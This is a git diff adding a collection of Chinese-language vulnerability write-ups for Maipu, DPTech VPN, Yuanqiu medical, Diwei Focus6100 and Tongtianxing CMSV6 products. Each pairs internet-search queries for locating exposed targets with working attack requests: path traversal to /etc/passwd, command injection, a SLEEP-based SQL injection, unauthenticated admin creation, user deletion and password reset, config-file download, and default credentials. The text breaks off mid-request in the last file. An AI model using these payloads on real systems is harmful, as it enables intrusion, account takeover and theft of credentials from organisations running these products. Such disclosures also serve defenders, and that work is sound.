diff --git a/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md b/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md
new file mode 100644
index 0000000..48dcc56
--- /dev/null
+++ b/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+# 迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞
+
+迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="/assets/css/ui-dialog.css"&& body="/form/formUserLogin"
+```
+
+## poc
+
+```javascript
+GET /DOWNLOAD_FILE/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Connection: keep-alive
+```
+
+![image-20241013140738432](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410131407485.png)
\ No newline at end of file
diff --git a/迈普安全网关sslvpn_client存在远程命令执行漏洞.md b/迈普安全网关sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..cb599e1
--- /dev/null
+++ b/迈普安全网关sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,39 @@
+# 迈普安全网关sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+迈普安全网关sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 迈普安全网关
+
+# 三、资产测绘
++ hunter`app.name=="MAIPU 迈普 MPSec"`
++ 特征![1701762281066-80c83a70-903d-4273-a66a-5df08ae34227.png](./img/nYJI0-JcxcVBhRa7/1701762281066-80c83a70-903d-4273-a66a-5df08ae34227-374241.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/nYJI0-JcxcVBhRa7/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-132060.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/nYJI0-JcxcVBhRa7/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-844096.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gkyi7fg6n1r30x4f>
\ No newline at end of file
diff --git a/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md b/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md
new file mode 100644
index 0000000..dd5267d
--- /dev/null
+++ b/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md
@@ -0,0 +1,30 @@
+# 远秋医学培训报名系统User存在未授权账号密码泄露漏洞
+
+# 一、漏洞简介
+远秋医学在线考试系统采用通用的试题库管理软件，适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞，攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞，攻击者可通过漏洞获取登录密码。
+
+# 二、影响版本
++ 远秋医学培训报名系统v1.0
+
+# 三、资产测绘
+```plain
+title="医学在线考试系统"
+```
+
+![1718993691264-f32b46f5-aee2-427a-927d-66a0611f6baa.png](./img/q7hZFjWmCGM7ykCO/1718993691264-f32b46f5-aee2-427a-927d-66a0611f6baa-072615.png)
+
+# 四、漏洞复现
+```java
+POST /Manage/Ajax/User.ashx/ HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+oper=getManagerList&name=&code=&depart=&page=1&rows=15
+```
+
+![1718993591536-7d8aac13-27e1-4b71-a358-2f92fd9f2d47.png](./img/q7hZFjWmCGM7ykCO/1718993591536-7d8aac13-27e1-4b71-a358-2f92fd9f2d47-022364.png)
+
+
+
+> 更新: 2024-08-28 15:30:39  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xp1atq8wl0rmv68n>
\ No newline at end of file
diff --git a/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md b/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md
new file mode 100644
index 0000000..f6cc4e9
--- /dev/null
+++ b/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md
@@ -0,0 +1,30 @@
+# 远秋医学培训报名系统v1.0 ManagerList存在未授权账号密码泄露漏洞
+
+# 一、漏洞简介
+远秋医学在线考试系统采用通用的试题库管理软件，适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞，攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞，攻击者可通过漏洞获取登录密码。
+
+# 二、影响版本
++ 远秋医学培训报名系统v1.0
+
+# 三、资产测绘
+```plain
+title="远秋医学培训报名系统v1.0"
+```
+
+![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/H5wj7sp5XRf9yr1n/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-639148.png)
+
+# 四、漏洞复现
+```java
+/User/ManagerList.aspx?ty=1&ty=1
+```
+
+![1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5.png](./img/H5wj7sp5XRf9yr1n/1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5-960549.png)
+
+使用获取密码登录系统
+
+![1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05.png](./img/H5wj7sp5XRf9yr1n/1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05-563873.png)
+
+
+
+> 更新: 2024-06-23 23:40:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qy0el2vabhtch5nc>
\ No newline at end of file
diff --git a/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md b/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md
new file mode 100644
index 0000000..ce76f3c
--- /dev/null
+++ b/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞
+
+# 一、漏洞简介
+远秋医学在线考试系统采用通用的试题库管理软件，适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞，攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞
+
+# 二、影响版本
++ 远秋医学培训报名系统v1.0
+
+# 三、资产测绘
+```plain
+title="远秋医学培训报名系统v1.0"
+```
+
+![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/22HsGx4nQsThBnpU/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-296659.png)
+
+# 四、漏洞复现
+```java
+python3 sqlmap.py -u "http://127.0.0.1/NewsDetailPage.aspx?key=news&id=7" --batch
+```
+
+![1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120.png](./img/22HsGx4nQsThBnpU/1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120-208793.png)
+
+stacked queries
+
+![1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372.png](./img/22HsGx4nQsThBnpU/1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372-205010.png)
+
+
+
+> 更新: 2024-06-23 23:40:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fn5a1ryltdg50eik>
\ No newline at end of file
diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户删除.md b/迪威讯Focus6100音视频通讯平台存在任意用户删除.md
new file mode 100644
index 0000000..3fe1718
--- /dev/null
+++ b/迪威讯Focus6100音视频通讯平台存在任意用户删除.md
@@ -0,0 +1,47 @@
+# 迪威讯Focus6100音视频通讯平台存在任意用户删除
+
+# 一、漏洞简介
+迪威讯Focus6100音视频通讯平台存在任意用户删除
+
+# 二、影响版本
++ 迪威讯Focus6100音视频通讯平台
+
+# 三、资产测绘
++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"`
++ 特征
+
+![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/iCp6n463PYDv5NDp/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-020946.png)
+
+# 四 、漏洞复现
+先获取ID
+
+```java
+GET /portal/rest/users HTTP/1.1
+Host: 
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8.png](./img/iCp6n463PYDv5NDp/1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8-624829.png)
+
+利用获取ID删除用户
+
+```java
+DELETE /portal/rest/users/ff8080819200f6750192274beccc0019 HTTP/1.1
+Host: 
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1727237124222-466859ab-cbe1-4ef1-a344-0acb772d2535.png](./img/iCp6n463PYDv5NDp/1727237124222-466859ab-cbe1-4ef1-a344-0acb772d2535-711660.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xl9p6cln9rou66gy>
\ No newline at end of file
diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md b/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md
new file mode 100644
index 0000000..cf92202
--- /dev/null
+++ b/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md
@@ -0,0 +1,56 @@
+# 迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞
+
+# 一、漏洞简介
+迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞
+
+# 二、影响版本
++ 迪威讯Focus6100音视频通讯平台
+
+# 三、资产测绘
++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"`
++ 特征
+
+![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/MTvBdG6ERuHZMlFh/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-959691.png)
+
+# 四 、漏洞复现
+先获取ID
+
+```java
+GET /portal/rest/users HTTP/1.1
+Host: 
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8.png](./img/MTvBdG6ERuHZMlFh/1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8-255472.png)
+
+利用获取ID重置密码
+
+```java
+PUT /portal/rest/users/ff8080819200f6750192272f08bb0000/changepassword HTTP/1.1
+Host: 
+Content-Length: 32
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Connection: close
+
+e10adc3949ba59abbe56e057f20f883e
+```
+
+![1727237017987-fc40aacc-8356-4d97-ac60-c5e007fd5fe0.png](./img/MTvBdG6ERuHZMlFh/1727237017987-fc40aacc-8356-4d97-ac60-c5e007fd5fe0-606119.png)
+
+重置后登录：
+
+![1727237031040-5d6fa479-b51f-42b9-ad53-f0924196b2e2.png](./img/MTvBdG6ERuHZMlFh/1727237031040-5d6fa479-b51f-42b9-ad53-f0924196b2e2-561445.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iucuo1rzm9ml0ugx>
\ No newline at end of file
diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md b/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md
new file mode 100644
index 0000000..be1f042
--- /dev/null
+++ b/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md
@@ -0,0 +1,40 @@
+# 迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞
+
+# 一、漏洞简介
+迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞
+
+# 二、影响版本
++ 迪威讯Focus6100音视频通讯平台
+
+# 三、资产测绘
++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"`
++ 特征
+
+![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/0oTztu8wtNxM6fDr/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-858583.png)
+
+# 四 、漏洞复现
+```java
+POST /portal/rest/users HTTP/1.1
+Host: 
+Content-Length: 85
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Connection: close
+
+{"role":"Administrator","name":"test1","password":"e10adc3949ba59abbe56e057f20f883e"}
+```
+
+![1727236694945-4d6de57a-5d7b-466c-9196-174780417908.png](./img/0oTztu8wtNxM6fDr/1727236694945-4d6de57a-5d7b-466c-9196-174780417908-597623.png)
+
+test1/123456
+
+![1727236724047-c0a67d6a-2398-4693-99a3-c094b0c6125c.png](./img/0oTztu8wtNxM6fDr/1727236724047-c0a67d6a-2398-4693-99a3-c094b0c6125c-790238.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/psg86y8exbitmfsk>
\ No newline at end of file
diff --git a/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md b/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..d34a2ea
--- /dev/null
+++ b/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md
@@ -0,0 +1,31 @@
+# 迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞
+
+# 一、漏洞简介
+迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞
+
+# 二、影响版本
++ 迪威讯Focus6100音视频通讯平台
+
+# 三、资产测绘
++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"`
++ 特征
+
+![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/KnyYKXzCYtkOpk7c/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-744711.png)
+
+# 四 、漏洞复现
+```java
+GET /portal/rest/users HTTP/1.1
+Host: 
+Accept: application/json, text/plain, */*
+Current-User: admin|Administrator
+Accept-Language: zh-CN
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1727236656514-5bb4c381-fbea-4fc1-b574-5c4e273f04e8.png](./img/KnyYKXzCYtkOpk7c/1727236656514-5bb4c381-fbea-4fc1-b574-5c4e273f04e8-402836.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tgilgex06w0aebxb>
\ No newline at end of file
diff --git a/迪威讯Focus6100音视频通讯平台存在默认口令.md b/迪威讯Focus6100音视频通讯平台存在默认口令.md
new file mode 100644
index 0000000..837d7a5
--- /dev/null
+++ b/迪威讯Focus6100音视频通讯平台存在默认口令.md
@@ -0,0 +1,25 @@
+# 迪威讯Focus6100音视频通讯平台存在默认口令
+
+# 一、漏洞简介
+迪威讯Focus6100音视频通讯平台存在默认口令
+
+# 二、影响版本
++ 迪威讯Focus6100音视频通讯平台
+
+# 三、资产测绘
++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"`
++ 特征
+
+![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/d_MM-ba6htDUAIze/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-553392.png)
+
+# 四 、漏洞复现
+```java
+admin/admin
+```
+
+![1727236535116-6b187be5-de46-4866-9551-77c70e969f05.png](./img/d_MM-ba6htDUAIze/1727236535116-6b187be5-de46-4866-9551-77c70e969f05-122706.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uih487sqqcqnmzs0>
\ No newline at end of file
diff --git a/迪普DPTech-VPN-任意文件读取.md b/迪普DPTech-VPN-任意文件读取.md
new file mode 100644
index 0000000..6700619
--- /dev/null
+++ b/迪普DPTech-VPN-任意文件读取.md
@@ -0,0 +1,23 @@
+## 迪普DPTech VPN 任意文件读取 CNVD-2023-69478
+杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞，攻击者可利用该漏洞获敏感信息。
+
+## 漏洞影响产品
+杭州迪普科技股份有限公司DPtech SSL VPN
+
+## fofa
+```
+title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"
+```
+
+## poc
+```
+GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+Host: xxxxxxxxx
+Cookie: SSLVPN_lang=1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+se
+```
+## 漏洞复现
+![](./assets/780475ed2a4b528fe68184a4f665a7d1fe08f3.png)
+
+![](./assets/7171140331ad9063b8e9a92e8161c325c0b418.png)
diff --git a/迪普DPTech-VPN任意文件读取(补丁绕过).md b/迪普DPTech-VPN任意文件读取(补丁绕过).md
new file mode 100644
index 0000000..2b86910
--- /dev/null
+++ b/迪普DPTech-VPN任意文件读取(补丁绕过).md
@@ -0,0 +1,19 @@
+## 迪普DPTech-VPN任意文件读取(补丁绕过)
+杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞，攻击者可利用该漏洞获敏感信息。
+
+## fofa
+```javascript
+title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"
+```
+
+## poc
+```javascript
+GET /.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+![image-20241012132203032](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121322100.png)
diff --git a/迪普VPN文件读取漏洞.md b/迪普VPN文件读取漏洞.md
new file mode 100644
index 0000000..0d7cd00
--- /dev/null
+++ b/迪普VPN文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 迪普VPN 文件读取漏洞
+
+# 一、漏洞简介
+杭州迪普科技股份有限公司（简称“迪普科技”） 以“让网络更简单、智能、安全”为使命，聚焦于网络安全及应用交付领域，是一家集研发、生产、销售于一体的高科技上市企业迪普VPN存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等.
+
+# 二、漏洞简介
++ 迪普VPN
+
+# 三、资产测绘
++ hunter`app.name="迪普科技 SSL VPN"`
++ 特征
+
+![1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768.png](./img/czNyRt8mHUwlBYkD/1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768-159962.png)
+
+# 四、漏洞复现
+```plain
+/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
+```
+
+![1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7.png](./img/czNyRt8mHUwlBYkD/1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7-175575.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ta805nfg17vfpqiy>
\ No newline at end of file
diff --git a/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md b/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
new file mode 100644
index 0000000..10148f9
--- /dev/null
+++ b/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞
+
+该漏洞是由于通天星CMSV6车载定位监控平台 /alarm_appeal/getAlarmAppealByGuid 接口处未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。
+
+## fofa
+
+```java
+body="/808gps/"
+```
+
+## poc
+
+```java
+POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+ 
+guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(5)))PITq) AND ('qhqF'='qhqF
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408282321708.png)
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md b/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md
new file mode 100644
index 0000000..520d30c
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md
@@ -0,0 +1,33 @@
+# 通天星CMSV6车载视频监控平台 MobileAction_downLoad存在任意文件下载漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台存在任意文件下载漏洞，攻击者可通过此漏洞下载敏感文件信息，获取数据库账号密码，从而为下一步攻击做准备。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/O6cMOOUOshBGj0hG/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-535114.png)
+
+# 四、漏洞复现
+```plain
+GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: language=zh; style=1; EnableAESLogin=0; maintitle=%u5317%u6597%u4E3B%u52A8%u5B89%u5168%u4E91%u5E73%u53F0; name=value; JSESSIONID=91A2BB4151F3DCBD654371B8E33B7221
+Upgrade-Insecure-Requests: 1
+```
+
+![1699407453347-449fe4b6-8e51-4242-becb-b8dbe12b9312.png](./img/O6cMOOUOshBGj0hG/1699407453347-449fe4b6-8e51-4242-becb-b8dbe12b9312-854633.png)
+
+
+
+> 更新: 2024-12-28 13:05:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/af5xnrnru81i15zt>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md
new file mode 100644
index 0000000..0f1394e
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md
@@ -0,0 +1,39 @@
+# 通天星CMSV6车载视频监控平台 SelectDevAction_loadServerLoggerFile存在信息泄露漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/AY8vLTutAnleML4f/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-105320.png)
+
+# 四、漏洞复现
+```plain
+POST /808gps/LoggerManagement/SelectDevAction_loadServerLoggerFile.action HTTP/1.1
+Host: {hostname}
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
+Connection: close
+
+page=1&rp=15&query=&qtype=&pagin=%257B%2522currentPage%2522%253A1%252C%2522pageRecords%2522%253A15%257D
+```
+
+![1703419489990-7686e3c1-cc5b-47aa-911f-58344b3d833e.png](./img/AY8vLTutAnleML4f/1703419489990-7686e3c1-cc5b-47aa-911f-58344b3d833e-465266.png)
+
+nuclei脚本
+
+[通天星-CMSV6-selectdevaction-loadserverloggerfile-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362335744-7f4aa846-6ab1-4fda-99a8-38cd92d8f800.yaml)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uok15t8ka9xabpil>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md
new file mode 100644
index 0000000..0b5360c
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md
@@ -0,0 +1,38 @@
+# 通天星CMSV6车载视频监控平台 SelectDevAction_loadWebLoggerFile存在信息泄露漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/TXQxrAkI_D_RFddr/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-856466.png)
+
+# 四、漏洞复现
+```plain
+POST /808gps/LoggerManagement/SelectDevAction_loadWebLoggerFile.action HTTP/1.1
+Host: 
+Content-Length: 103
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+jsessionId: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
